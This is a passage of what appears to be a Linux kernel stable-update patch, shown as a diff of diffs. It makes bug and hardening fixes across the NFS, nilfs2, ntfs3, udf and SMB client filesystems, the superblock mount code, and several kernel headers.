+@@ -997,7 +996,6 @@ struct nfs_client *nfs4_set_ds_client(struct nfs_server *mds_srv,
+ 	if (mds_srv->flags & NFS_MOUNT_NORESVPORT)
+ 		__set_bit(NFS_CS_NORESVPORT, &cl_init.init_flags);
+ 
+-	__set_bit(NFS_CS_DS, &cl_init.init_flags);
+ 	__set_bit(NFS_CS_PNFS, &cl_init.init_flags);
+ 	cl_init.max_connect = NFS_MAX_TRANSPORTS;
+ 	/*
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index cc620fc7aaf7b..467e9439ededb 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -8821,7 +8821,7 @@ nfs4_run_exchange_id(struct nfs_client *clp, const struct cred *cred,
+ #ifdef CONFIG_NFS_V4_1_MIGRATION
+ 	calldata->args.flags |= EXCHGID4_FLAG_SUPP_MOVED_MIGR;
+ #endif
+-	if (test_bit(NFS_CS_DS, &clp->cl_flags))
++	if (test_bit(NFS_CS_PNFS, &clp->cl_flags))
+ 		calldata->args.flags |= EXCHGID4_FLAG_USE_PNFS_DS;
+ 	msg.rpc_argp = &calldata->args;
+ 	msg.rpc_resp = &calldata->res;
+diff --git a/fs/nilfs2/btnode.c b/fs/nilfs2/btnode.c
+index ee2cde07264bb..19ed9015bd660 100644
+--- a/fs/nilfs2/btnode.c
++++ b/fs/nilfs2/btnode.c
+@@ -51,12 +51,21 @@ nilfs_btnode_create_block(struct address_space *btnc, __u64 blocknr)
+ 
+ 	bh = nilfs_grab_buffer(inode, btnc, blocknr, BIT(BH_NILFS_Node));
+ 	if (unlikely(!bh))
+-		return NULL;
++		return ERR_PTR(-ENOMEM);
+ 
+ 	if (unlikely(buffer_mapped(bh) || buffer_uptodate(bh) ||
+ 		     buffer_dirty(bh))) {
+-		brelse(bh);
+-		BUG();
++		/*
++		 * The block buffer at the specified new address was already
++		 * in use.  This can happen if it is a virtual block number
++		 * and has been reallocated due to corruption of the bitmap
++		 * used to manage its allocation state (if not, the buffer
++		 * clearing of an abandoned b-tree node is missing somewhere).
++		 */
++		nilfs_error(inode->i_sb,
++			    "state inconsistency probably due to duplicate use of b-tree node block address %llu (ino=%lu)",
++			    (unsigned long long)blocknr, inode->i_ino);
++		goto failed;
+ 	}
+ 	memset(bh->b_data, 0, i_blocksize(inode));
+ 	bh->b_bdev = inode->i_sb->s_bdev;
+@@ -67,6 +76,12 @@ nilfs_btnode_create_block(struct address_space *btnc, __u64 blocknr)
+ 	unlock_page(bh->b_page);
+ 	put_page(bh->b_page);
+ 	return bh;
++
++failed:
++	unlock_page(bh->b_page);
++	put_page(bh->b_page);
++	brelse(bh);
++	return ERR_PTR(-EIO);
+ }
+ 
+ int nilfs_btnode_submit_block(struct address_space *btnc, __u64 blocknr,
+@@ -217,8 +232,8 @@ int nilfs_btnode_prepare_change_key(struct address_space *btnc,
+ 	}
+ 
+ 	nbh = nilfs_btnode_create_block(btnc, newkey);
+-	if (!nbh)
+-		return -ENOMEM;
++	if (IS_ERR(nbh))
++		return PTR_ERR(nbh);
+ 
+ 	BUG_ON(nbh == obh);
+ 	ctxt->newbh = nbh;
+diff --git a/fs/nilfs2/btree.c b/fs/nilfs2/btree.c
+index 146640f0607a3..bd24a33fc72e1 100644
+--- a/fs/nilfs2/btree.c
++++ b/fs/nilfs2/btree.c
+@@ -63,8 +63,8 @@ static int nilfs_btree_get_new_block(const struct nilfs_bmap *btree,
+ 	struct buffer_head *bh;
+ 
+ 	bh = nilfs_btnode_create_block(btnc, ptr);
+-	if (!bh)
+-		return -ENOMEM;
++	if (IS_ERR(bh))
++		return PTR_ERR(bh);
+ 
+ 	set_buffer_nilfs_volatile(bh);
+ 	*bhp = bh;
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 04943ab40a011..5110c50be2918 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -136,7 +136,7 @@ static void nilfs_dispose_list(struct the_nilfs *, struct list_head *, int);
+ 
+ #define nilfs_cnt32_ge(a, b)   \
+ 	(typecheck(__u32, a) && typecheck(__u32, b) && \
+-	 ((__s32)(a) - (__s32)(b) >= 0))
++	 ((__s32)((a) - (b)) >= 0))
+ 
+ static int nilfs_prepare_segment_lock(struct super_block *sb,
+ 				      struct nilfs_transaction_info *ti)
+diff --git a/fs/ntfs3/attrib.c b/fs/ntfs3/attrib.c
+index 2618bf5a37892..0388e6b42100f 100644
+--- a/fs/ntfs3/attrib.c
++++ b/fs/ntfs3/attrib.c
+@@ -242,7 +242,7 @@ int attr_make_nonresident(struct ntfs_inode *ni, struct ATTRIB *attr,
+ 	struct ntfs_sb_info *sbi;
+ 	struct ATTRIB *attr_s;
+ 	struct MFT_REC *rec;
+-	u32 used, asize, rsize, aoff, align;
++	u32 used, asize, rsize, aoff;
+ 	bool is_data;
+ 	CLST len, alen;
+ 	char *next;
+@@ -263,10 +263,13 @@ int attr_make_nonresident(struct ntfs_inode *ni, struct ATTRIB *attr,
+ 	rsize = le32_to_cpu(attr->res.data_size);
+ 	is_data = attr->type == ATTR_DATA && !attr->name_len;
+ 
+-	align = sbi->cluster_size;
+-	if (is_attr_compressed(attr))
+-		align <<= COMPRESSION_UNIT;
+-	len = (rsize + align - 1) >> sbi->cluster_bits;
++	/* len - how many clusters required to store 'rsize' bytes */
++	if (is_attr_compressed(attr)) {
++		u8 shift = sbi->cluster_bits + NTFS_LZNT_CUNIT;
++		len = ((rsize + (1u << shift) - 1) >> shift) << NTFS_LZNT_CUNIT;
++	} else {
++		len = bytes_to_cluster(sbi, rsize);
++	}
+ 
+ 	run_init(run);
+ 
+@@ -678,7 +681,8 @@ int attr_set_size(struct ntfs_inode *ni, enum ATTR_TYPE type,
+ 			goto undo_2;
+ 		}
+ 
+-		if (!is_mft)
++		/* keep runs for $MFT::$ATTR_DATA and $MFT::$ATTR_BITMAP. */
++		if (ni->mi.rno != MFT_REC_MFT)
+ 			run_truncate_head(run, evcn + 1);
+ 
+ 		svcn = le64_to_cpu(attr->nres.svcn);
+@@ -1637,6 +1641,7 @@ int attr_allocate_frame(struct ntfs_inode *ni, CLST frame, size_t compr_size,
+ 
+ 	attr_b->nres.total_size = cpu_to_le64(total_size);
+ 	inode_set_bytes(&ni->vfs_inode, total_size);
++	ni->ni_flags |= NI_FLAG_UPDATE_PARENT;
+ 
+ 	mi_b->dirty = true;
+ 	mark_inode_dirty(&ni->vfs_inode);
+diff --git a/fs/ntfs3/bitmap.c b/fs/ntfs3/bitmap.c
+index c055bbdfe0f7c..dfe4930ccec64 100644
+--- a/fs/ntfs3/bitmap.c
++++ b/fs/ntfs3/bitmap.c
+@@ -1356,7 +1356,7 @@ int wnd_extend(struct wnd_bitmap *wnd, size_t new_bits)
+ 
+ 		err = ntfs_vbo_to_lbo(sbi, &wnd->run, vbo, &lbo, &bytes);
+ 		if (err)
+-			break;
++			return err;
+ 
+ 		bh = ntfs_bread(sb, lbo >> sb->s_blocksize_bits);
+ 		if (!bh)
+diff --git a/fs/ntfs3/dir.c b/fs/ntfs3/dir.c
+index 98f57d0c702eb..dcd689ed4baae 100644
+--- a/fs/ntfs3/dir.c
++++ b/fs/ntfs3/dir.c
+@@ -326,7 +326,8 @@ static inline int ntfs_filldir(struct ntfs_sb_info *sbi, struct ntfs_inode *ni,
+ 	 * It does additional locks/reads just to get the type of name.
+ 	 * Should we use additional mount option to enable branch below?
+ 	 */
+-	if ((fname->dup.fa & FILE_ATTRIBUTE_REPARSE_POINT) &&
++	if (((fname->dup.fa & FILE_ATTRIBUTE_REPARSE_POINT) ||
++	     fname->dup.ea_size) &&
+ 	    ino != ni->mi.rno) {
+ 		struct inode *inode = ntfs_iget5(sbi->sb, &e->ref, NULL);
+ 		if (!IS_ERR_OR_NULL(inode)) {
+diff --git a/fs/ntfs3/file.c b/fs/ntfs3/file.c
+index 14efe46df91ef..6f03de747e375 100644
+--- a/fs/ntfs3/file.c
++++ b/fs/ntfs3/file.c
+@@ -396,10 +396,7 @@ static int ntfs_file_mmap(struct file *file, struct vm_area_struct *vma)
+ 		}
+ 
+ 		if (ni->i_valid < to) {
+-			if (!inode_trylock(inode)) {
+-				err = -EAGAIN;
+-				goto out;
+-			}
++			inode_lock(inode);
+ 			err = ntfs_extend_initialized_size(file, ni,
+ 							   ni->i_valid, to);
+ 			inode_unlock(inode);
+diff --git a/fs/ntfs3/frecord.c b/fs/ntfs3/frecord.c
+index d260260900241..02465ab3f398c 100644
+--- a/fs/ntfs3/frecord.c
++++ b/fs/ntfs3/frecord.c
+@@ -1501,7 +1501,7 @@ int ni_insert_nonresident(struct ntfs_inode *ni, enum ATTR_TYPE type,
+ 
+ 	if (is_ext) {
+ 		if (flags & ATTR_FLAG_COMPRESSED)
+-			attr->nres.c_unit = COMPRESSION_UNIT;
++			attr->nres.c_unit = NTFS_LZNT_CUNIT;
+ 		attr->nres.total_size = attr->nres.alloc_size;
+ 	}
+ 
+diff --git a/fs/ntfs3/fslog.c b/fs/ntfs3/fslog.c
+index 6d0d9b1c3b2e7..8e23bd6cd0f2f 100644
+--- a/fs/ntfs3/fslog.c
++++ b/fs/ntfs3/fslog.c
+@@ -2999,7 +2999,7 @@ static struct ATTRIB *attr_create_nonres_log(struct ntfs_sb_info *sbi,
+ 	if (is_ext) {
+ 		attr->name_off = SIZEOF_NONRESIDENT_EX_LE;
+ 		if (is_attr_compressed(attr))
+-			attr->nres.c_unit = COMPRESSION_UNIT;
++			attr->nres.c_unit = NTFS_LZNT_CUNIT;
+ 
+ 		attr->nres.run_off =
+ 			cpu_to_le16(SIZEOF_NONRESIDENT_EX + name_size);
+@@ -3937,6 +3937,9 @@ int log_replay(struct ntfs_inode *ni, bool *initialized)
+ 		goto out;
+ 	}
+ 
++	log->page_mask = log->page_size - 1;
++	log->page_bits = blksize_bits(log->page_size);
++
+ 	/* If the file size has shrunk then we won't mount it. */
+ 	if (l_size < le64_to_cpu(ra2->l_size)) {
+ 		err = -EINVAL;
+diff --git a/fs/ntfs3/fsntfs.c b/fs/ntfs3/fsntfs.c
+index 4c2d079b3d49b..97723a839c81a 100644
+--- a/fs/ntfs3/fsntfs.c
++++ b/fs/ntfs3/fsntfs.c
+@@ -475,7 +475,7 @@ static int ntfs_extend_mft(struct ntfs_sb_info *sbi)
+ 	struct ATTRIB *attr;
+ 	struct wnd_bitmap *wnd = &sbi->mft.bitmap;
+ 
+-	new_mft_total = (wnd->nbits + MFT_INCREASE_CHUNK + 127) & (CLST)~127;
++	new_mft_total = ALIGN(wnd->nbits + NTFS_MFT_INCREASE_STEP, 128);
+ 	new_mft_bytes = (u64)new_mft_total << sbi->record_bits;
+ 
+ 	/* Step 1: Resize $MFT::DATA. */
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index 730629235ffa1..9c36e0f3468d7 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -979,7 +979,7 @@ static struct indx_node *indx_new(struct ntfs_index *indx,
+ 		hdr->used =
+ 			cpu_to_le32(eo + sizeof(struct NTFS_DE) + sizeof(u64));
+ 		de_set_vbn_le(e, *sub_vbn);
+-		hdr->flags = 1;
++		hdr->flags = NTFS_INDEX_HDR_HAS_SUBNODES;
+ 	} else {
+ 		e->size = cpu_to_le16(sizeof(struct NTFS_DE));
+ 		hdr->used = cpu_to_le32(eo + sizeof(struct NTFS_DE));
+@@ -1677,7 +1677,7 @@ static int indx_insert_into_root(struct ntfs_index *indx, struct ntfs_inode *ni,
+ 	e->size = cpu_to_le16(sizeof(struct NTFS_DE) + sizeof(u64));
+ 	e->flags = NTFS_IE_HAS_SUBNODES | NTFS_IE_LAST;
+ 
+-	hdr->flags = 1;
++	hdr->flags = NTFS_INDEX_HDR_HAS_SUBNODES;
+ 	hdr->used = hdr->total =
+ 		cpu_to_le32(new_root_size - offsetof(struct INDEX_ROOT, ihdr));
+ 
+diff --git a/fs/ntfs3/inode.c b/fs/ntfs3/inode.c
+index 2c8c32d9fcaa1..28cbae3954315 100644
+--- a/fs/ntfs3/inode.c
++++ b/fs/ntfs3/inode.c
+@@ -1459,7 +1459,7 @@ struct inode *ntfs_create_inode(struct user_namespace *mnt_userns,
+ 			attr->size = cpu_to_le32(SIZEOF_NONRESIDENT_EX + 8);
+ 			attr->name_off = SIZEOF_NONRESIDENT_EX_LE;
+ 			attr->flags = ATTR_FLAG_COMPRESSED;
+-			attr->nres.c_unit = COMPRESSION_UNIT;
++			attr->nres.c_unit = NTFS_LZNT_CUNIT;
+ 			asize = SIZEOF_NONRESIDENT_EX + 8;
+ 		} else {
+ 			attr->size = cpu_to_le32(SIZEOF_NONRESIDENT + 8);
+@@ -1967,5 +1967,6 @@ const struct address_space_operations ntfs_aops = {
+ const struct address_space_operations ntfs_aops_cmpr = {
+ 	.read_folio	= ntfs_read_folio,
+ 	.readahead	= ntfs_readahead,
++	.dirty_folio	= block_dirty_folio,
+ };
+ // clang-format on
+diff --git a/fs/ntfs3/ntfs.h b/fs/ntfs3/ntfs.h
+index 324c0b036fdc1..625f2b52bd586 100644
+--- a/fs/ntfs3/ntfs.h
++++ b/fs/ntfs3/ntfs.h
+@@ -82,10 +82,6 @@ typedef u32 CLST;
+ #define RESIDENT_LCN   ((CLST)-2)
+ #define COMPRESSED_LCN ((CLST)-3)
+ 
+-#define COMPRESSION_UNIT     4
+-#define COMPRESS_MAX_CLUSTER 0x1000
+-#define MFT_INCREASE_CHUNK   1024
+-
+ enum RECORD_NUM {
+ 	MFT_REC_MFT		= 0,
+ 	MFT_REC_MIRR		= 1,
+@@ -690,14 +686,15 @@ static inline bool de_has_vcn_ex(const struct NTFS_DE *e)
+ 	      offsetof(struct ATTR_FILE_NAME, name) + \
+ 	      NTFS_NAME_LEN * sizeof(short), 8)
+ 
++#define NTFS_INDEX_HDR_HAS_SUBNODES cpu_to_le32(1)
++
+ struct INDEX_HDR {
+ 	__le32 de_off;	// 0x00: The offset from the start of this structure
+ 			// to the first NTFS_DE.
+ 	__le32 used;	// 0x04: The size of this structure plus all
+ 			// entries (quad-word aligned).
+ 	__le32 total;	// 0x08: The allocated size of for this structure plus all entries.
+-	u8 flags;	// 0x0C: 0x00 = Small directory, 0x01 = Large directory.
+-	u8 res[3];
++	__le32 flags;	// 0x0C: 0x00 = Small directory, 0x01 = Large directory.
+ 
+ 	//
+ 	// de_off + used <= total
+@@ -744,7 +741,7 @@ static inline struct NTFS_DE *hdr_next_de(const struct INDEX_HDR *hdr,
+ 
+ static inline bool hdr_has_subnode(const struct INDEX_HDR *hdr)
+ {
+-	return hdr->flags & 1;
++	return hdr->flags & NTFS_INDEX_HDR_HAS_SUBNODES;
+ }
+ 
+ struct INDEX_BUFFER {
+@@ -764,7 +761,7 @@ static inline bool ib_is_empty(const struct INDEX_BUFFER *ib)
+ 
+ static inline bool ib_is_leaf(const struct INDEX_BUFFER *ib)
+ {
+-	return !(ib->ihdr.flags & 1);
++	return !(ib->ihdr.flags & NTFS_INDEX_HDR_HAS_SUBNODES);
+ }
+ 
+ /* Index root structure ( 0x90 ). */
+diff --git a/fs/ntfs3/ntfs_fs.h b/fs/ntfs3/ntfs_fs.h
+index 0f9bec29f2b70..3e65ccccdb899 100644
+--- a/fs/ntfs3/ntfs_fs.h
++++ b/fs/ntfs3/ntfs_fs.h
+@@ -197,6 +197,8 @@ struct ntfs_index {
+ 
+ /* Minimum MFT zone. */
+ #define NTFS_MIN_MFT_ZONE 100
++/* Step to increase the MFT. */
++#define NTFS_MFT_INCREASE_STEP 1024
+ 
+ /* Ntfs file system in-core superblock data. */
+ struct ntfs_sb_info {
+diff --git a/fs/proc/task_mmu.c b/fs/proc/task_mmu.c
+index a954305fbc31b..484886cdd272c 100644
+--- a/fs/proc/task_mmu.c
++++ b/fs/proc/task_mmu.c
+@@ -1513,6 +1513,8 @@ static int pagemap_pmd_range(pmd_t *pmdp, unsigned long addr, unsigned long end,
+ 		}
+ #endif
+ 
++		if (page && !PageAnon(page))
++			flags |= PM_FILE;
+ 		if (page && !migration && page_mapcount(page) == 1)
+ 			flags |= PM_MMAP_EXCLUSIVE;
+ 
+diff --git a/fs/smb/client/cifsfs.c b/fs/smb/client/cifsfs.c
+index 78340d904c7b9..6384e1b2b2ef7 100644
+--- a/fs/smb/client/cifsfs.c
++++ b/fs/smb/client/cifsfs.c
+@@ -1872,12 +1872,12 @@ init_cifs(void)
+ 					   WQ_FREEZABLE|WQ_MEM_RECLAIM, 0);
+ 	if (!serverclose_wq) {
+ 		rc = -ENOMEM;
+-		goto out_destroy_serverclose_wq;
++		goto out_destroy_deferredclose_wq;
+ 	}
+ 
+ 	rc = cifs_init_inodecache();
+ 	if (rc)
+-		goto out_destroy_deferredclose_wq;
++		goto out_destroy_serverclose_wq;
+ 
+ 	rc = init_mids();
+ 	if (rc)
+@@ -1939,6 +1939,8 @@ init_cifs(void)
+ 	destroy_mids();
+ out_destroy_inodecache:
+ 	cifs_destroy_inodecache();
++out_destroy_serverclose_wq:
++	destroy_workqueue(serverclose_wq);
+ out_destroy_deferredclose_wq:
+ 	destroy_workqueue(deferredclose_wq);
+ out_destroy_cifsoplockd_wq:
+@@ -1949,8 +1951,6 @@ init_cifs(void)
+ 	destroy_workqueue(decrypt_wq);
+ out_destroy_cifsiod_wq:
+ 	destroy_workqueue(cifsiod_wq);
+-out_destroy_serverclose_wq:
+-	destroy_workqueue(serverclose_wq);
+ out_clean_proc:
+ 	cifs_proc_clean();
+ 	return rc;
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index 8c2a784200ec2..21b344762d0f8 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -2592,6 +2592,13 @@ cifs_get_tcon(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ 			cifs_dbg(VFS, "Server does not support mounting with posix SMB3.11 extensions\n");
+ 			rc = -EOPNOTSUPP;
+ 			goto out_fail;
++		} else if (ses->server->vals->protocol_id == SMB10_PROT_ID)
++			if (cap_unix(ses))
++				cifs_dbg(FYI, "Unix Extensions requested on SMB1 mount\n");
++			else {
++				cifs_dbg(VFS, "SMB1 Unix Extensions not supported by server\n");
++				rc = -EOPNOTSUPP;
++				goto out_fail;
+ 		} else {
+ 			cifs_dbg(VFS, "Check vers= mount option. SMB3.11 "
+ 				"disabled but required for POSIX extensions\n");
+@@ -3975,6 +3982,7 @@ int cifs_mount(struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx)
+ }
+ #endif
+ 
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+ /*
+  * Issue a TREE_CONNECT request.
+  */
+@@ -4096,11 +4104,25 @@ CIFSTCon(const unsigned int xid, struct cifs_ses *ses,
+ 		else
+ 			tcon->Flags = 0;
+ 		cifs_dbg(FYI, "Tcon flags: 0x%x\n", tcon->Flags);
+-	}
+ 
++		/*
++		 * reset_cifs_unix_caps calls QFSInfo which requires
++		 * need_reconnect to be false, but we would not need to call
++		 * reset_caps if this were not a reconnect case so must check
++		 * need_reconnect flag here.  The caller will also clear
++		 * need_reconnect when tcon was successful but needed to be
++		 * cleared earlier in the case of unix extensions reconnect
++		 */
++		if (tcon->need_reconnect && tcon->unix_ext) {
++			cifs_dbg(FYI, "resetting caps for %s\n", tcon->tree_name);
++			tcon->need_reconnect = false;
++			reset_cifs_unix_caps(xid, tcon, NULL, NULL);
++		}
++	}
+ 	cifs_buf_release(smb_buffer);
+ 	return rc;
+ }
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+ 
+ static void delayed_free(struct rcu_head *p)
+ {
+diff --git a/fs/super.c b/fs/super.c
+index d138332e57a94..b116f72cd122a 100644
+--- a/fs/super.c
++++ b/fs/super.c
+@@ -569,6 +569,17 @@ struct super_block *sget_fc(struct fs_context *fc,
+ 	struct user_namespace *user_ns = fc->global ? &init_user_ns : fc->user_ns;
+ 	int err;
+ 
++	/*
++	 * Never allow s_user_ns != &init_user_ns when FS_USERNS_MOUNT is
++	 * not set, as the filesystem is likely unprepared to handle it.
++	 * This can happen when fsconfig() is called from init_user_ns with
++	 * an fs_fd opened in another user namespace.
++	 */
++	if (user_ns != &init_user_ns && !(fc->fs_type->fs_flags & FS_USERNS_MOUNT)) {
++		errorfc(fc, "VFS: Mounting from non-initial user namespace is not allowed");
++		return ERR_PTR(-EPERM);
++	}
++
+ retry:
+ 	spin_lock(&sb_lock);
+ 	if (test) {
+diff --git a/fs/udf/balloc.c b/fs/udf/balloc.c
+index f416b7fe092fc..c4c18eeacb60c 100644
+--- a/fs/udf/balloc.c
++++ b/fs/udf/balloc.c
+@@ -68,8 +68,12 @@ static int read_block_bitmap(struct super_block *sb,
+ 	}
+ 
+ 	for (i = 0; i < count; i++)
+-		if (udf_test_bit(i + off, bh->b_data))
++		if (udf_test_bit(i + off, bh->b_data)) {
++			bitmap->s_block_bitmap[bitmap_nr] =
++							ERR_PTR(-EFSCORRUPTED);
++			brelse(bh);
+ 			return -EFSCORRUPTED;
++		}
+ 	return 0;
+ }
+ 
+@@ -85,8 +89,15 @@ static int __load_block_bitmap(struct super_block *sb,
+ 			  block_group, nr_groups);
+ 	}
+ 
+-	if (bitmap->s_block_bitmap[block_group])
++	if (bitmap->s_block_bitmap[block_group]) {
++		/*
++		 * The bitmap failed verification in the past. No point in
++		 * trying again.
++		 */
++		if (IS_ERR(bitmap->s_block_bitmap[block_group]))
++			return PTR_ERR(bitmap->s_block_bitmap[block_group]);
+ 		return block_group;
++	}
+ 
+ 	retval = read_block_bitmap(sb, bitmap, block_group, block_group);
+ 	if (retval < 0)
+diff --git a/fs/udf/super.c b/fs/udf/super.c
+index 6dc9d8dad88eb..65fbc60a88e44 100644
+--- a/fs/udf/super.c
++++ b/fs/udf/super.c
+@@ -266,7 +266,8 @@ static void udf_sb_free_bitmap(struct udf_bitmap *bitmap)
+ 	int nr_groups = bitmap->s_nr_groups;
+ 
+ 	for (i = 0; i < nr_groups; i++)
+-		brelse(bitmap->s_block_bitmap[i]);
++		if (!IS_ERR_OR_NULL(bitmap->s_block_bitmap[i]))
++			brelse(bitmap->s_block_bitmap[i]);
+ 
+ 	kvfree(bitmap);
+ }
+diff --git a/include/asm-generic/vmlinux.lds.h b/include/asm-generic/vmlinux.lds.h
+index 1d1f480a5e9e4..e7539dc024981 100644
+--- a/include/asm-generic/vmlinux.lds.h
++++ b/include/asm-generic/vmlinux.lds.h
+@@ -101,7 +101,7 @@
+ #define DATA_MAIN .data .data.[0-9a-zA-Z_]* .data..L* .data..compoundliteral* .data.$__unnamed_* .data.$L*
+ #define SDATA_MAIN .sdata .sdata.[0-9a-zA-Z_]*
+ #define RODATA_MAIN .rodata .rodata.[0-9a-zA-Z_]* .rodata..L*
+-#define BSS_MAIN .bss .bss.[0-9a-zA-Z_]* .bss..compoundliteral*
++#define BSS_MAIN .bss .bss.[0-9a-zA-Z_]* .bss..L* .bss..compoundliteral*
+ #define SBSS_MAIN .sbss .sbss.[0-9a-zA-Z_]*
+ #else
+ #define TEXT_MAIN .text
+diff --git a/include/drm/drm_mipi_dsi.h b/include/drm/drm_mipi_dsi.h
+index 66a7e01c62608..1a921e8943a03 100644
+--- a/include/drm/drm_mipi_dsi.h
++++ b/include/drm/drm_mipi_dsi.h
+@@ -309,15 +309,18 @@ int mipi_dsi_dcs_get_display_brightness_large(struct mipi_dsi_device *dsi,
+  * @cmd: Command
+  * @seq: buffer containing data to be transmitted
+  */
+-#define mipi_dsi_dcs_write_seq(dsi, cmd, seq...) do {				\
+-		static const u8 d[] = { cmd, seq };				\
+-		struct device *dev = &dsi->dev;	\
+-		int ret;						\
+-		ret = mipi_dsi_dcs_write_buffer(dsi, d, ARRAY_SIZE(d));	\
+-		if (ret < 0) {						\
+-			dev_err_ratelimited(dev, "sending command %#02x failed: %d\n", cmd, ret); \
+-			return ret;						\
+-		}						\
++#define mipi_dsi_dcs_write_seq(dsi, cmd, seq...)                            \
++	do {                                                                \
++		static const u8 d[] = { cmd, seq };                         \
++		struct device *dev = &dsi->dev;                             \
++		ssize_t ret;                                                \
++		ret = mipi_dsi_dcs_write_buffer(dsi, d, ARRAY_SIZE(d));     \
++		if (ret < 0) {                                              \
++			dev_err_ratelimited(                                \
++				dev, "sending command %#02x failed: %zd\n", \
++				cmd, ret);                                  \
++			return ret;                                         \
++		}                                                           \
+ 	} while (0)
+ 
+ /**
+diff --git a/include/linux/bpf_verifier.h b/include/linux/bpf_verifier.h
+index f080ccf27d256..6a524c5462a6f 100644
+--- a/include/linux/bpf_verifier.h
++++ b/include/linux/bpf_verifier.h
+@@ -645,7 +645,7 @@ static inline u32 type_flag(u32 type)
+ /* only use after check_attach_btf_id() */
+ static inline enum bpf_prog_type resolve_prog_type(const struct bpf_prog *prog)
+ {
+-	return prog->type == BPF_PROG_TYPE_EXT ?
++	return (prog->type == BPF_PROG_TYPE_EXT && prog->aux->dst_prog) ?
+ 		prog->aux->dst_prog->type : prog->type;
+ }
+ 
+diff --git a/include/linux/hugetlb.h b/include/linux/hugetlb.h
+index 37eeef9841c4e..cc555072940f9 100644
+--- a/include/linux/hugetlb.h
++++ b/include/linux/hugetlb.h
+@@ -694,6 +694,7 @@ HPAGEFLAG(RawHwpUnreliable, raw_hwp_unreliable)
+ /* Defines one hugetlb page size */
+ struct hstate {
+ 	struct mutex resize_lock;
++	struct lock_class_key resize_key;
+ 	int next_nid_to_alloc;
+ 	int next_nid_to_free;
+ 	unsigned int order;
+diff --git a/include/linux/jbd2.h b/include/linux/jbd2.h
+index 6611af5f1d0c6..e301d323108d1 100644
+--- a/include/linux/jbd2.h
++++ b/include/linux/jbd2.h
+@@ -1665,11 +1665,6 @@ int jbd2_wait_inode_data(journal_t *journal, struct jbd2_inode *jinode);
+ int jbd2_fc_wait_bufs(journal_t *journal, int num_blks);
+ int jbd2_fc_release_bufs(journal_t *journal);
+ 
+-static inline int jbd2_journal_get_max_txn_bufs(journal_t *journal)
+-{
+-	return (journal->j_total_len - journal->j_fc_wbufsize) / 4;
+-}
+-
+ /*
+  * is_journal_abort
+  *
+diff --git a/include/linux/jump_label.h b/include/linux/jump_label.h
+index 570831ca99518..4e968ebadce60 100644
+--- a/include/linux/jump_label.h
++++ b/include/linux/jump_label.h
+@@ -224,9 +224,10 @@ extern bool arch_jump_label_transform_queue(struct jump_entry *entry,
+ 					    enum jump_label_type type);
+ extern void arch_jump_label_transform_apply(void);
+ extern int jump_label_text_reserved(void *start, void *end);
+-extern void static_key_slow_inc(struct static_key *key);
++extern bool static_key_slow_inc(struct static_key *key);
++extern bool static_key_fast_inc_not_disabled(struct static_key *key);
+ extern void static_key_slow_dec(struct static_key *key);
+-extern void static_key_slow_inc_cpuslocked(struct static_key *key);
++extern bool static_key_slow_inc_cpuslocked(struct static_key *key);
+ extern void static_key_slow_dec_cpuslocked(struct static_key *key);
+ extern int static_key_count(struct static_key *key);
+ extern void static_key_enable(struct static_key *key);
+@@ -278,11 +279,23 @@ static __always_inline bool static_key_true(struct static_key *key)
+ 	return false;
+ }
+ 
+-static inline void static_key_slow_inc(struct static_key *key)
++static inline bool static_key_fast_inc_not_disabled(struct static_key *key)
+ {
++	int v;
++
+ 	STATIC_KEY_CHECK_USE(key);
+-	atomic_inc(&key->enabled);
++	/*
++	 * Prevent key->enabled getting negative to follow the same semantics
++	 * as for CONFIG_JUMP_LABEL=y, see kernel/jump_label.c comment.
++	 */
++	v = atomic_read(&key->enabled);
++	do {
++		if (v < 0 || (v + 1) < 0)
++			return false;
++	} while (!likely(atomic_try_cmpxchg(&key->enabled, &v, v + 1)));
++	return true;
+ }
++#define static_key_slow_inc(key)	static_key_fast_inc_not_disabled(key)
+ 
+ static inline void static_key_slow_dec(struct static_key *key)
+ {
+diff --git a/include/linux/mlx5/qp.h b/include/linux/mlx5/qp.h
+index ca0eee571ad7b..15e8d7fd3879f 100644
+--- a/include/linux/mlx5/qp.h
++++ b/include/linux/mlx5/qp.h
+@@ -566,9 +566,12 @@ static inline const char *mlx5_qp_state_str(int state)
+ 
+ static inline int mlx5_get_qp_default_ts(struct mlx5_core_dev *dev)
+ {
+-	return !MLX5_CAP_ROCE(dev, qp_ts_format) ?
+-		       MLX5_TIMESTAMP_FORMAT_FREE_RUNNING :
+-		       MLX5_TIMESTAMP_FORMAT_DEFAULT;
++	u8 supported_ts_cap = mlx5_get_roce_state(dev) ?
++			      MLX5_CAP_ROCE(dev, qp_ts_format) :
++			      MLX5_CAP_GEN(dev, sq_ts_format);
++
++	return supported_ts_cap ? MLX5_TIMESTAMP_FORMAT_DEFAULT :
++	       MLX5_TIMESTAMP_FORMAT_FREE_RUNNING;
+ }
+ 
+ #endif /* MLX5_QP_H */
+diff --git a/include/linux/objagg.h b/include/linux/objagg.h
+index 78021777df462..6df5b887dc547 100644
+--- a/include/linux/objagg.h
++++ b/include/linux/objagg.h
+@@ -8,7 +8,6 @@ struct objagg_ops {
+ 	size_t obj_size;
+ 	bool (*delta_check)(void *priv, const void *parent_obj,
+ 			    const void *obj);
+-	int (*hints_obj_cmp)(const void *obj1, const void *obj2);
+ 	void * (*delta_create)(void *priv, void *parent_obj, void *obj);
+ 	void (*delta_destroy)(void *priv, void *delta_priv);
+ 	void * (*root_create)(void *priv, void *obj, unsigned int root_id);
+diff --git a/include/linux/pci.h b/include/linux/pci.h
+index 4da7411da9baf..df73fb26b8250 100644
+--- a/include/linux/pci.h
++++ b/include/linux/pci.h
+@@ -1138,6 +1138,7 @@ int pci_get_interrupt_pin(struct pci_dev *dev, struct pci_dev **bridge);
+ u8 pci_common_swizzle(struct pci_dev *dev, u8 *pinp);
